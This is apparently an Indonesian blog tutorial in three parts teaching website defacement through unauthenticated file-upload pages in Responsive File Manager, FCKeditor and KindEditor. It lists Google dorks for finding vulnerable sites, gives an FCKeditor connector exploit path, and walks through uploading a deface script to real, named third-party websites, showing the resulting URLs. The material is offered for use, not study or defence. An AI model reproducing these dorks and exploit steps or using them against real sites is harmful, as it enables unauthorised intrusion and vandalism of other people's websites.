Oke Jumpa Lagi Ama Gw Kali Ini Gw Akan Kasih Tutorial Deface POC Responsive File Manager

Yaudh Gausah Lama-Lama Hemat Kuota wkwkwkwk

BAHAN-BAHAN: 1. DORK
                                2. EXPLOIT (localhost)
                                3.SCRIPT


DORK: 
1.inurl:/filemanager
2.intext:"dialog.php"
3.inurl:/js/filemanager/
4.intext:"dialog.php
5.inurl:/assets/filemanager

 NOTE: KEMBANGIN DORKNYA BIAR MANTEP

Dork dulu digoogle pake dork diatas





Nah Kalo Udh Ngedork Pilih Salah Satu Target

Kali Ini Saya Pakai Target : https://www.studioporto.web.id/assets/filemanager/


Kalo Udh Ketemu Target Cari Dialog.php

Nanti akan Muncul Kayak Gambar Dibawah





Tinggal upload Sc Lu 
Lihat Gambar Dibawah




Buat Masuk Ke Penyimpanan Lu Tekan Yang Gw Lingkarin Dibawah







Kalo Berhasil Upload Muncul Kayak Gambar Dibawah Liat Gambar Dibawah 




Nah Kalo Udh Kayak Gitu Berarti Udh Berhasil

Sekarang Tinggal Cari script lu 





Kalo Udh Ketemu Liat URL nya
 
Cara Liat URL Ada Di Gambar Bawah




Tekan Show URL

Trus Akan Muncul Kayak Gambar Dibawah




Tinggal Kalian Copy Semua Dan Buka Di Tab Baru


Hasil Silahkan Liat Gambar Dibawah  



UDAH DONE KAN;)
SEKIAN TUTOR DEFACE POC RESPONSIVE FILE MANAGER
SAMPAI JUMPA DI NEXT TIME




HelloSobat Ketemu Lagi Ama Gw
Dan Kali Ini Gw Akan Jelasin Gimana Deface Dengan Poc Fckeditor
BAHAN: 1. DORK
                2.EXPLOIT
                3.SCRIPT LU
DORK:
inurl:advert_detail.php?id=
EXPLOIT:
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

INGET id BISA DIGANTI AMA ALAMAT WEB NEGERA LAIN MISAL uk
BIAR TARGET BEDA DORK GW GANTI DENGAN 
inurl:advert_detail.php?jp=



Seperti Biasa Kita Cari Web Sesuai Fealing Kita
Disini gw Pake Target:

Kalo Udh Nemu Target Lu Masukkin Exploit Diatas
Contoh: http://fatihkocakotomotiv.com.tr/advert_detail.php?PageType=4&ID=1458 Kalau Udh Dimasukkin Exploitnya Jadi: http://fatihkocakotomotiv.com.tr//admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Kalo Udah Bakal MUncul Tempat Upload.... Liat Gambar Dibawah 





Kalo Udh Pilih Script Lu Lihat gambar dibawah 


Nah Disitu Pilih Sc Lu... Kalo Udh Jan Lupa DiUpload 






Nah Kalo Udh Diupload Cara Manggil Sc Lu Gini
www.target.com/files/namasclu.html
contoh:http://fatihkocakotomotiv.com.tr/files/CWJ[1](1).html
 

NAH SIMPLE KAN
SEMUA BISA KALO MAU BELAJAR
SAMPAI JUMPA DI NEXT TIME


  

 

Oke kali ini saya akan mengajarkan kalian deface poc kindeditor/upload button
bahan: 1.Dork
           2.Script
 Masukan Dorknya ke Google :

inurl:examples/uploadbutton.html
inurl:kindeditor

Kalo Udah Hasilnya Kayak Gini



Pilih Salah Satu Target Sesuai Hati Kalian 

Kali Ini Target Saya Adalah
www.nb-medicalsystem.com/.../examples/uploadbutton.htm


Sekarang Tinggal Upload Script Lu



Kalo Udah Akan Muncul Exploit Untuk Manggil Sc Lu
Tinggal Pilih semua Trus Salin Masukkin dibelakang web
Contoh: http://www.nb-medicalsystem.com/kindeditor/examples/uploadbutton.html
NTAR JADI NYA KAYAK: http://www.nb-medicalsystem.com//upload/img/file/20180713/20180713035038_51965.html.... Kalo Masih Bingung Lihat Gambar Dibawah


SEKARANG SCRIPT LU UDAH MUNCUL DAN DONE
THANKS UDH MAMPIR BRO